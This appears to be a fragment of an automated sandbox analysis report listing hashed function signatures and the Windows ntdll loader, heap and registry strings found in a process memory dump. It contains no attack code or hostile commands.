                                                      • Instruction ID: 73c014261f4ab60369ef1a094395d6f95c55f3b864829a9b4bc6255a916b2c24
                                                      • Opcode Fuzzy Hash: a6d23c1dc74b319b25ae7e26bebaa15ffd47e85fa5e5cec929c4cde8f221547e
                                                      • Instruction Fuzzy Hash: AB619E72951228AFDB25EF54DC88BDEF7B8AF14710F0501E9E908AB250CB749E80CF90
                                                      Strings
                                                      • HEAP: , xrefs: 0329E6B3
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0329E6C6
                                                      • HEAP[%wZ]: , xrefs: 0329E6A6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      • API String ID: 0-1340214556
                                                      • Opcode ID: 798a8c9eae7533e822622400523bf3543affcb05ae92f57077d3f76ae3eabd03
                                                      • Instruction ID: 38f65349366cb9fdc271295c8b683114662697228f4d77df4eb562e92281ab52
                                                      • Opcode Fuzzy Hash: 798a8c9eae7533e822622400523bf3543affcb05ae92f57077d3f76ae3eabd03
                                                      • Instruction Fuzzy Hash: D1510775624745FFE716DB68D984F6ABBF8FF06700F0800A5E5418B692D7B4E990CB10
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 032B82D7
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 032B82E8
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 032B82DE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: dbac2cc941d7effb5b1d223344e04fb3cc4a3cd6eb9d1298d575da977c4d2073
                                                      • Instruction ID: 844d15dce5fbd5b2c2dc6e47a2325c2502a8aa5687c78a9005567e3e0659f134
                                                      • Opcode Fuzzy Hash: dbac2cc941d7effb5b1d223344e04fb3cc4a3cd6eb9d1298d575da977c4d2073
                                                      • Instruction Fuzzy Hash: 354103B5574311AFC720EB34D881B9B77ECBF45790F04892AF948DB290EBB4D8808B91
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 032FC212
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 032FC1C5
                                                      • @, xrefs: 032FC1F1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: b7e13e491655b2940ca95ac2dfd2484d1287a505b38c59c73a4d7fbba2520ba9
                                                      • Instruction ID: f691b1a0e77700547e5aee02cbd55d5ff80b1d04154b6a15ad9ff1b5cde5f528
                                                      • Opcode Fuzzy Hash: b7e13e491655b2940ca95ac2dfd2484d1287a505b38c59c73a4d7fbba2520ba9
                                                      • Instruction Fuzzy Hash: 7A415075E2021EEFDB11DBE4C851BEEF7B8EB14710F14407AEA15A7290D7B4DA848B50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 59645d946cf69e9a2a921d015f627590a2d98d6c9fde6ad08ace1d9510b91463
                                                      • Instruction ID: 25c00e0fdceb855a0b5c357222b438cb1b10da717233923119156ed007fe4b69
                                                      • Opcode Fuzzy Hash: 59645d946cf69e9a2a921d015f627590a2d98d6c9fde6ad08ace1d9510b91463
                                                      • Instruction Fuzzy Hash: 1F4104359253588BEB25EBA6C844BADB7B8FF45740F28045AE901EF781DBB49981CB10
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 032C4888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 032C4899
                                                      • LdrpCheckRedirection, xrefs: 032C488F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 7a720bccce10a704db02b8dd3b2a75887520bd49dfe691c29ce806e49813f403
                                                      • Instruction ID: 2718bd37fbf121c02fedee65bf239cb14d5b9bd4244af4e257e74fcabdb704e9
                                                      • Opcode Fuzzy Hash: 7a720bccce10a704db02b8dd3b2a75887520bd49dfe691c29ce806e49813f403
                                                      • Instruction Fuzzy Hash: 5941D432A307919FCB22EE1AE860A27B7E8BF49750F09035DEC49DB251D370D880CB91
                                                      Strings
                                                      • RtlCreateActivationContext, xrefs: 032B29F9
                                                      • Actx , xrefs: 032733AC
                                                      • SXS: %s() passed the empty activation context data, xrefs: 032B29FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                      • API String ID: 0-859632880
                                                      • Opcode ID: ab531c3cc8244d64dba3c58fbe71486ef73273610a53a8190dba9126ba710dcf
                                                      • Instruction ID: d7572b2f41bc4a7432dd5cb01c6ea6a7c61b64b8d3a785d38b75e3a95590ba4d
                                                      • Opcode Fuzzy Hash: ab531c3cc8244d64dba3c58fbe71486ef73273610a53a8190dba9126ba710dcf
                                                      • Instruction Fuzzy Hash: 3A311436630316EFDB26DE58C890B9AB7A4BB44750F198869FE059F281C7B0E9C1C7D0
                                                      Strings
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 032B1A51
                                                      • LdrpInitializeTls, xrefs: 032B1A47
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 032B1A40
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      • Opcode ID: 31abcf7f40daae7e139b654a888ec987665c180f551068de194b67d8d26514cd
                                                      • Instruction ID: e023518f2d9b697f041c6eae5d79163620404bf2d2763fa88bddeb073fd34558
                                                      • Opcode Fuzzy Hash: 31abcf7f40daae7e139b654a888ec987665c180f551068de194b67d8d26514cd
                                                      • Instruction Fuzzy Hash: FE31F435A30301BBE720EB58CC85FAA76BCFF46758F054169E905AB190D7B0BED48790
                                                      Strings
                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0328127B
                                                      • BuildLabEx, xrefs: 0328130F
                                                      • @, xrefs: 032812A5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                      • API String ID: 0-3051831665
                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                      • Instruction ID: 9e7192c011b4e81dc8a08fd0b9dcd622795e433269d6897561be869a1a7f5771
                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                      • Instruction Fuzzy Hash: 0931B376921218AFCB11EF95CC40EEEBBBDEB84750F104425F904AB1E0D770EA958B50
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 032C20FA
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 032C2104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 032C20F3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 6fb061a4b99f92a311caa170ba60330bf47a02893ae96c2bff3f2421094a980f
                                                      • Instruction ID: 182b897459dfb9164de416e1e4c18417f7be2f55a06ba4b64a93bc45cc77e7fc
                                                      • Opcode Fuzzy Hash: 6fb061a4b99f92a311caa170ba60330bf47a02893ae96c2bff3f2421094a980f
                                                      • Instruction Fuzzy Hash: 70F0FF34660358FFEA20EA489C42F997B6CEB41F54F144468FA007B682D6E0E9808A92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: 97d822c86842e42da0abbfc080921ea45c4481468acbca4b61028272253d009b
                                                      • Instruction ID: dd7aa312fd01f73bc247902b307bba17be8ba44f1be3303c3ad0484037bc9457
                                                      • Opcode Fuzzy Hash: 97d822c86842e42da0abbfc080921ea45c4481468acbca4b61028272253d009b
                                                      • Instruction Fuzzy Hash: A3717D75A2064A9FCB01DF99C980BAEB7F8FF08344F154065E905EB251EB74EE81CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@
                                                      • API String ID: 0-149943524
                                                      • Opcode ID: 5cb02d0f6417196d4563acea937cf4ab3169fedd61a48d28339e4aec080e064a
                                                      • Instruction ID: ef5181c25b9fa44583a00d8f3c3cc27b42fa1131321e1723654793fae6e15920
                                                      • Opcode Fuzzy Hash: 5cb02d0f6417196d4563acea937cf4ab3169fedd61a48d28339e4aec080e064a
                                                      • Instruction Fuzzy Hash: 5A329C745287528BC724CF18C484B3EB7E5EF86740F28491EF9969B290E774DAC4CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: d95c2f70799209961fa67a262dc445dd23206ed40e4c472b7070dccea077ae8d
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: AFC1CF312143469BDB24CF28DCA1B6BFBE5BF84718F088A2DF9958A2D0D7B4D545CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: e2646bfb3cc5e5c142fa5e7e1765a6e7f89f747f6434d686bfcd105b06fa89b2
                                                      • Instruction ID: 7b35580aeba46e07343ebcb600773ce98f8d6b40e0ef4d66f2a731d22118f9d6
                                                      • Opcode Fuzzy Hash: e2646bfb3cc5e5c142fa5e7e1765a6e7f89f747f6434d686bfcd105b06fa89b2
                                                      • Instruction Fuzzy Hash: 49618D71E207199FDB14DFA8E840BEEBBB9FB48340F15406DE559EB291D770A980CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$
                                                      • API String ID: 0-233714265
                                                      • Opcode ID: 6183b6d819189802d009f6b12ab942ff2fd6a76db91da37eb571f3115c72ccc7
                                                      • Instruction ID: 84d54530ceac3aca5c67826a6c15e5a5f5ff3c84bd927ffe57b981191e8e331d
                                                      • Opcode Fuzzy Hash: 6183b6d819189802d009f6b12ab942ff2fd6a76db91da37eb571f3115c72ccc7
                                                      • Instruction Fuzzy Hash: 0161E375A2074AEFDB20EFA4D684BADB7B5FF44704F144469E9156F280C7B4AAC1CB80
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0324A309
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0324A2FB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: 74121fbd1778e944762c512431cd0fc6279d97d015ca15c3a2e1f5f0e0fcc510
                                                      • Instruction ID: eee30e396ddcc14442e58653d88c398b39de8946dfc638c1919b65bef6ab003e
                                                      • Opcode Fuzzy Hash: 74121fbd1778e944762c512431cd0fc6279d97d015ca15c3a2e1f5f0e0fcc510
                                                      • Instruction Fuzzy Hash: FA418D35A64746DBDB25CF59C440B69BBF4FF85700F2848A9EC01DB291F275D980CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local\$@
                                                      • API String ID: 0-380025441
                                                      • Opcode ID: 56147cd2b29292e6ac995979fc65e5cfa7596f3212658f5a3a177941bef9b770
                                                      • Instruction ID: c7c3f4cdf225cbabd1ab54c1fc90b4219ec8815b47a5ce784b33d6023066348e
                                                      • Opcode Fuzzy Hash: 56147cd2b29292e6ac995979fc65e5cfa7596f3212658f5a3a177941bef9b770
                                                      • Instruction Fuzzy Hash: C231A17A529305DFC320DF28C480A5BBBE8FB84654F48092EFA9587250DA75DD84DBD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: c4b66d9d084229ca569a158b3097561376756b94b20024b1a30b96349ec4d507
                                                      • Instruction ID: 9041df5c274f3d3f4c2cd23ba3da7e3704fa58a2a7bd63a0b50fe155e483bcd0
                                                      • Opcode Fuzzy Hash: c4b66d9d084229ca569a158b3097561376756b94b20024b1a30b96349ec4d507
                                                      • Instruction Fuzzy Hash: 4C827B75E212299FDB28CFA9C880BADF7B5BF48710F18816AD819AB351D7709D81CF50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aabf5840ccba42295dc1c6a3e5c53216a8bcdaed6d555771c2613f5fb01ae7b
                                                      • Instruction ID: 017ad20c7782dad87e5685c91e46fd624d014d7cf0547e2dbb08bde8516f1a02
                                                      • Opcode Fuzzy Hash: 7aabf5840ccba42295dc1c6a3e5c53216a8bcdaed6d555771c2613f5fb01ae7b
                                                      • Instruction Fuzzy Hash: E0A18D75624742CFD324DF28D480A2ABBFABF88310F14496DF5A58B350E770E985CB92
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8868aaad31142f4f3d55defc992cf15d8fd20241c9171c805d8bb744c85892a4
                                                      • Instruction ID: 5a76a92860f5f622d3a6e8a84a19eaef3eb811e7cd57e85887ce79d717d7511b
                                                      • Opcode Fuzzy Hash: 8868aaad31142f4f3d55defc992cf15d8fd20241c9171c805d8bb744c85892a4
                                                      • Instruction Fuzzy Hash: 6E416F75D25289EFCB20DFA9D981AADFBF8FB49300F14816ED455A7211D7709980CF60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 1f68760bf65e74c1b4ed493caa01101c7d626af5c10f4a1da8a931cbe232784e
                                                      • Instruction ID: ab6c245deb3e1d0e4a9a61e509b2733947581f01a591a89850005f9489ae68d2
                                                      • Opcode Fuzzy Hash: 1f68760bf65e74c1b4ed493caa01101c7d626af5c10f4a1da8a931cbe232784e
                                                      • Instruction Fuzzy Hash: B7718D75E2020A9FDF28CF98D5906EDBBB2FF48750F18816EE805AB240D7708881CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction ID: a0329e368e551e9d7f635d8bcc2398cfdae1fcdd948012bb647d42b7ceb435a4
                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction Fuzzy Hash: 00616975D2131AEFDB25DFA9D840BAEBBB4FF84710F144569E810A7290D7B49A80CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction ID: 7fd0832110bf6691f3527f5feb1bea5800c5c70b71d23a03fc90f4970c8c1066
                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction Fuzzy Hash: 3D51AB72534382BFDB21DF14C940F6AB7E9FB84750F040A2DBA409B290D7B0ED948B92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: b826e63e66258685ef840cde035da15c4cdf6a90fc6b803cf87dfe6012be237a
                                                      • Instruction ID: 9da289f45486ab622454f51f01f5eb1522de8aa4411a55dbb3cbc02a7962b22a
                                                      • Opcode Fuzzy Hash: b826e63e66258685ef840cde035da15c4cdf6a90fc6b803cf87dfe6012be237a
                                                      • Instruction Fuzzy Hash: 6941A076529302ABD710DA75C940BABB7E8AF88714F05092DFD84EB180E6B4DB84C796
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PreferredUILanguages
                                                      • API String ID: 0-1884656846
                                                      • Opcode ID: 1ade4aa56ac486252206cac92f5e1e970fdfd89646363fb8b1db527961ae5a8f
                                                      • Instruction ID: 622ae4ed14bac0f24290ea67bd51988c85d3596d96a9ff3f6cb6eb17559a346d
                                                      • Opcode Fuzzy Hash: 1ade4aa56ac486252206cac92f5e1e970fdfd89646363fb8b1db527961ae5a8f
                                                      • Instruction Fuzzy Hash: 6F41E676D60219AFCF11EA94C850BEEF3BAEF44750F090136EA11AB250D6B0DEC0C7A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: acdc0189ecd8aa0e5505746b583d9992ab2bb3ea23d1127874feb508dfbc5a9f
                                                      • Instruction ID: d736bc456c2f86a88e8aef8837d0dad00841e94b2a3b94fac41f5cadc50d6973
                                                      • Opcode Fuzzy Hash: acdc0189ecd8aa0e5505746b583d9992ab2bb3ea23d1127874feb508dfbc5a9f
                                                      • Instruction Fuzzy Hash: BE4141B5D1122DABDB21EB50DC84FEEB77CAB44754F0045A5AA08AB140DB709EC98FA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      • Opcode ID: a1fcf9deb2165c80aa8850f63c367932d99cf1e2b53298c17898e3138e265531
                                                      • Instruction ID: c05e5d2176344d1aadc545e12354cbc7583c86caf100ccf49f08d053477f3781
                                                      • Opcode Fuzzy Hash: a1fcf9deb2165c80aa8850f63c367932d99cf1e2b53298c17898e3138e265531
                                                      • Instruction Fuzzy Hash: 7A3193B66303439FEB24DF29A890A66B7E9FB49710F58827DE505DF280E7718DC08790
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kLsE
                                                      • API String ID: 0-3058123920
                                                      • Opcode ID: 3a2026042142d63d18a43efc9531ad453e48d1c2e6b3d49fc3e78b6bd036ec36
                                                      • Instruction ID: bb5a0257e3c8d3a11ea8bde5e5b4d01415ab9eb46caadbfcb7bdf904984d37ee
                                                      • Opcode Fuzzy Hash: 3a2026042142d63d18a43efc9531ad453e48d1c2e6b3d49fc3e78b6bd036ec36
                                                      • Instruction Fuzzy Hash: 4C417B36520352AEE721FF78E8C7B697B98EB40B64F588118EC909F0C9C7B444C5C7A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      • Opcode ID: 6598da409870ad5ff77cbdaeb67ed67ea91c60f3715b29b349a6359e6f7862c5
                                                      • Instruction ID: 7dba29525c09359e037c695b379cca248e34069ca39eff158a2cb222ac3105a6
                                                      • Opcode Fuzzy Hash: 6598da409870ad5ff77cbdaeb67ed67ea91c60f3715b29b349a6359e6f7862c5
                                                      • Instruction Fuzzy Hash: 50418AB5625302DFC714CF18C480A96FBE8FB49750F18856EE5598F241EB71D982CBD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L4CwL4Cw
                                                      • API String ID: 0-1654103815
                                                      • Opcode ID: c25782787ebfba097e3e8093aa4e12de886a97124c93f94dc5399b5c8e200c5c
                                                      • Instruction ID: 4f28c685235cfc1760c8a2361368067e9936979aeb50fda76f013ab7089cf483
                                                      • Opcode Fuzzy Hash: c25782787ebfba097e3e8093aa4e12de886a97124c93f94dc5399b5c8e200c5c
                                                      • Instruction Fuzzy Hash: 1321D6BAA20714AFD721DF18C440B1AB7B4FB86B50F154429E9559F380D7B0E9C0CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 99fe16758cd041ec2bf05e2105760ada89a53ce3424346a6efea49829a659f15
                                                      • Instruction ID: 4e76660f22b3b44078931f9bcbae4842e88f241da41efd7538d48aebc6627549
                                                      • Opcode Fuzzy Hash: 99fe16758cd041ec2bf05e2105760ada89a53ce3424346a6efea49829a659f15
                                                      • Instruction Fuzzy Hash: 3311B9353345038BEB2CC91D8850636B2D5EB9B714F3C912AE4D6DB351D6B2DCC18781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrCreateEnclave
                                                      • API String ID: 0-3262589265
                                                      • Opcode ID: 1050071e3955908c36a0247c73cc5addb6d8c06d1560feae537017b630956f29
                                                      • Instruction ID: ac664cdcd7068312edfd17b75491dd8fac824f0abbdad7c23d1aee97f0f9f8aa
                                                      • Opcode Fuzzy Hash: 1050071e3955908c36a0247c73cc5addb6d8c06d1560feae537017b630956f29
                                                      • Instruction Fuzzy Hash: 152138B15283849FC310DF1AC845A5BFBE8FBD5B10F004A1EF59487250D7B4E454CB92
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
